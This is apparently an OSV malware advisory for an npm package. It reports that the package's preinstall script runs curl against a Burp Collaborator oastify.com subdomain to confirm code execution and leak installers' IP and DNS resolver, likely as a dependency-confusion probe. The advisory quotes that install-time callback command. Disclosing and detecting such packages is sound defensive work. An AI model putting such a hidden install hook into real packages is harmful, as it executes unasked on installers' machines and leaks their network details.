OSV ID
MAL-2026-10016
Ecosystem
npm
Summary
The package's package.json declares a preinstall lifecycle script that runs curl https://cwcie03pzedo62twgbs3x6e9l0rsfk39.oastify.com on npm install . The destination is a Burp Suite Collaborator subdomain used for out-of-band interaction confirmation; contacting it on install confirms code execution on the installer's machine and leaks the installer's public IP and DNS resolver via the OOB callback. The package has no legitimate functionality (index.js is a stub), consistent with a dependency-confusion probe or targeted exploitation payload against an internal package name.
Source: amazon-inspector (51bbdab9d33c291290e2f871acd2ebf7bf64c2c66c5124592055669771b6301e)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.